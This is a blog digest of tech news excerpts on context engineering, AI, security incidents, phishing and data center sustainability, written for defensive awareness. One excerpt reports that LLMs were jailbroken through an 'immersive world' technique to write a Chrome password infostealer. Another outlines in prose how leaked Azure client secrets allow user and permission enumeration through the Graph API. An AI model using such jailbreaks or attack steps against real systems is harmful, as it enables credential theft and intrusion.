Quote for the day:
"Little minds are tamed and subdued by
misfortune; but great minds rise above it." -- Washington Irving

Context engineering is the strategic design, management, and delivery of relevant information—or “context”—to AI systems in order to guide, constrain, or enhance their behavior. Unlike prompt engineering, which primarily focuses on crafting effective input prompts to direct model outputs, context engineering involves curating, structuring, and governing the broader pool of information that surrounds and informs the AI’s decision-making process. In practice, context engineering requires an understanding of not only what the AI should know at a given moment but also how information should be prioritized, retrieved, and presented. It encompasses everything from assembling relevant documents and dialogue history to establishing policies for data inclusion and exclusion. ... While there is some overlap between the two domains, context engineering and prompt engineering serve distinct purposes and employ different methodologies. Prompt engineering is concerned with the formulation of the specific text—the “prompt”—that is provided to the model as an immediate input. It is about phrasing questions, instructions, or commands in a way that elicits the desired behavior or output from the AI. Successful prompt engineering involves experimenting with wording, structure, and sometimes even formatting to maximize the performance of the language model on a given task.

While artificial intelligence provides both intelligence and speed, Blockchain
technology provides the essential foundation of trust and security. Blockchain
functions as a permanent digital record – meaning that once information is
set, it can’t be changed or deleted by third parties. This feature is
particularly groundbreaking for ensuring a safe and clear rental history.
Picture this: the rental payments and lease contracts of your tenants could
all be documented as ‘smart contracts’ using Blockchain technology. ... The
combination of AI and Blockchain signifies a groundbreaking transformation,
enabling tenants to create ‘self-sovereign identities’ on the Blockchain —
digital wallets that hold their verified credentials, which they fully
control. When searching for rental properties, tenants can conveniently
provide prospective landlords with access to certain details about themselves,
such as their history of timely payments and police records. AI leverages
secure and authentic Blockchain data to produce an immediate risk score for
landlords to assess, ensuring a quick and reliable evaluation. This cohesive
approach guarantees that AI outcomes are both rapid and trustworthy, while the
decentralized nature of Blockchain safeguards tenant privacy by removing the
necessity for central databases that may become susceptible over time.

New research from Cato Networks threat intelligence report, revealed how
threat actors can use a large language model jailbreak technique, known as an
immersive world attack, to get AI to create infostealer malware for them: a
threat intelligence researcher with absolutely no malware coding experience
managed to jailbreak multiple large language models and get the AI to create a
fully functional, highly dangerous, password infostealer to compromise
sensitive information from the Google Chrome web browser. The end result was
malicious code that successfully extracted credentials from the Google Chrome
password manager. Companies that create LLMs are trying to put up guardrails,
but clearly GenAI can make malware creation that much easier. AI-generated
malware, including polymorphic malware, essentially makes signature-based
detections nearly obsolete. Enterprises must be prepared to protect against
hundreds, if not thousands, of malware variants. ... Enterprises can increase
their protection by embedding security directly into applications at the build
stage: this involves investing in embedded security that is mapped to OWASP
controls; such as RASP, advanced Whitebox cryptography, and granular threat
intelligence. IDC research shows that organizations protecting mobile apps
often lack a solution to test them efficiently and effectively.

Moving too quickly following an attack can also prompt staff to respond to an
intrusion without first fully understanding the type of ransomware that was
used. Not all ransomware is created equal and knowing if you were a victim of
locker ransomware, double extortion, ransomware-as-a-service, or another kind of
attack can make all the difference in how to respond because the goal of the
attacker is different for each. ... The first couple hours after a ransomware
incident is identified are critical. In those immediate hours, work quickly to
identify and isolate affected systems and disconnect compromised devices from
the network to prevent the ransomware from spreading further. Don’t forget to
also preserve forensic evidence as you go, such as screenshots, relevant logs,
anything to inform future law enforcement investigations or legal action. Once
that has been done, notify the key stakeholders and the cyber insurance
provider. ... After the dust settles, analyze how the attack was able to occur
and put in place fixes to keep it from happening again. Identify the initial
access point and method, and map how the threat actor moved through the network.
What barriers were they able to move past, and which held them back? Are there
areas where more segmentation is needed to reduce the attack surface? Do any
security workflows or policies need to be modified?

“While companies often admit to sharing user data with third parties, it’s
nearly impossible to track every recipient. That lack of control creates real
vulnerabilities in data privacy management. Very few organizations thoroughly
vet their third-party data-sharing practices, which raises accountability
concerns and increases the risk of breaches,” said Ian Cohen, CEO of LOKKER. The
criminal marketplace for stolen data has exploded in recent years. In 2024, over
6.8 million accounts were listed for sale, and by early 2025, nearly 2.5 million
stolen accounts were available at one point. ... Even limited purchase
information can prove valuable to criminals. A breach exposing high-value
transactions, for example, may suggest a buyer’s financial status or lifestyle.
When combined with leaked addresses, that data can help criminals identify and
target individuals more precisely, whether for fraud, identity theft, or even
physical theft. ... One key mechanism is the right to be forgotten, a legal
principle allowing individuals to request the removal of their personal data
from online platforms. The European Union’s GDPR is the strongest example of
this principle in action. While not as comprehensive as the GDPR, the US has
some privacy protections, such as the California Consumer Privacy Act (CCPA),
which allow residents to access or delete their personal data.
The ink is barely dry on generative AI and AI agents, and now we have a new next
big thing: agentic AI. Sounds impressive. By the time this article comes out,
there’s a good chance that agentic AI will be in the rear-view mirror and we’ll
all be chasing after the next new big thing. Anyone for autonomous generative
agentic AI agent bots? ... Some things on the surface seem more irresponsible
than others, but for some, agentic AI apparently not so much. Debugging large
language models, AI agents, and agentic AI, as well as implementing guardrails
are topics for another time, but it’s important to recognize that companies are
handing over those car keys. Willingly. Enthusiastically. Would you put that
eighth grader in charge of your marketing department? Of autonomously creating
collateral that goes out to your customers without checking it first? Of course
not. ... We want AI agents and agentic AI to make decisions, but we must be
intentional about the decisions they are allowed to make. What are the stakes
personally, professionally, or for the organization? What is the potential
liability when something goes wrong? And something will go wrong. Something that
you never considered going wrong will go wrong. And maybe think about the
importance of the training data. Isn’t that what we say when an actual person
does something wrong? “They weren’t adequately trained.” Same thing here.
/articles/software-engineers-excel-AI/en/smallimage/software-engineers-excel-AI-thumbnail-1756904662117.jpg)
As long as software development and AI designers continue to fall prey to the
substitution myth, we’ll continue to develop systems and tools that, instead of
supposedly making humans lives easier/better, will require unexpected new skills
and interventions from humans that weren’t factored into the system/tool design
... Software development covers a lot of ground, from understanding
requirements, architecting, designing, coding, writing tests, code review,
debugging, building new skills and knowledge, and more. AI has now reached a
point where it can automate or speed up almost every part of the process. This
is an exciting time to be a builder. A lot of the routine, repetitive, and
frankly boring parts of the job, the "cognitive grunt work", can now be handled
by AI. Developers especially appreciate the help in areas like generating test
cases, reviewing code, and writing documentation. When those tasks are off our
plate, we can spend more time on the things that really add value: solving
complex problems, designing great systems, thinking strategically, and growing
our skills. ... The elephant in the room is "whether AI will take over my job
one day?". Until this year, I always thought no, but the recent technological
advancements and new product offerings in this space are beginning to change my
mind. The reality is that we should be prepared for AI to change the software
development role as we know it.

Phishing tooling and infrastructure has evolved a lot in the past decade, while
the changes to business IT means there are both many more vectors for phishing
attack delivery, and apps and identities to target. Attackers can deliver links
over instant messenger apps, social media, SMS, malicious ads, and using in-app
messenger functionality, as well as sending emails directly from SaaS services
to bypass email-based checks. Likewise, there are now hundreds of apps per
enterprise to target, with varying levels of account security configuration. ...
Like modern credential and session phishing, links to malicious pages are
distributed over various delivery channels and using a variety of lures,
including impersonating CAPTCHA, Cloudflare Turnstile, simulating an error
loading a webpage, and many more. The variance in lure, and differences between
different versions of the same lure, can make it difficult to fingerprint and
detect based on visual elements alone. ... Preventing malicious OAuth grants
being authorized requires tight in-app management of user permissions and tenant
security settings. This is no mean feat when considering the 100s of apps in use
across the modern enterprise, many of which are not centrally managed by IT and
security teams

"The critical risk lies in the fact that this file was publicly accessible over
the Internet," according to the post. "This means anyone — from opportunistic
bots to advanced threat actors — could harvest the credentials and immediately
leverage them for cloud account compromise, data theft, or further intrusion."
... To exploit the flaw, an attacker can first use the leaked ClientId and
ClientSecret to authenticate against Azure AD using the OAuth2 Client
Credentials flow to acquire an access token. Once this is acquired, the attacker
then can send a GET request to the Microsoft Graph API to enumerate users within
the tenant. This allows them to collect usernames and emails; build a list for
password spraying or phishing; and/or identify naming conventions and internal
accounts, according to the post. The attacker also can query the Microsoft Graph
API to enumerate OAuth2 permission grants within the tenant, revealing which
applications have been authorized and what scopes, or permissions, they hold.
Finally, the acquired token allows an attacker to use group information to
identify privilege clusters and business-critical teams, thus exposing
organizational structure and identifying key targets for compromise, according
to the post. ... "What appears to be a harmless JSON configuration file can in
reality act as a master key to an organization’s cloud kingdom," according to
the post.
Data center owners and operators are uniquely positioned to step up and play a
larger, more proactive role in this by pushing back on tech manufacturers in
terms of the patchy emissions data they provide, while also facilitating
sustainable circular IT product lifecycle management/disposal solutions for
their users and customers. ... The hard truth, however, is that any data center
striving to meet its own decarbonization goals and obligations cannot do so
singlehandedly. It’s largely beholden to the supply chain stakeholders upstream.
At the same time, their customers/users tend to accept ever shortening usage
periods as the norm. Often, they overlook the benefits of achieving greater
product longevity and optimal cost of ownership through the implementation of
product maintenance, refurbishment, and reuse programmes. ... As a focal point
for the enablement of the digital economy, data centers are ideally placed to
take a much more active role: by lobbying manufacturers, educating users and
customers about the necessity and benefits of changing conventional linear
practices in favour of circular IT lifecycle management and recycling solutions.
Such an approach will not only help decarbonize data centers themselves but the
entire tech industry supply chain – by reducing emissions.
No comments:
Post a Comment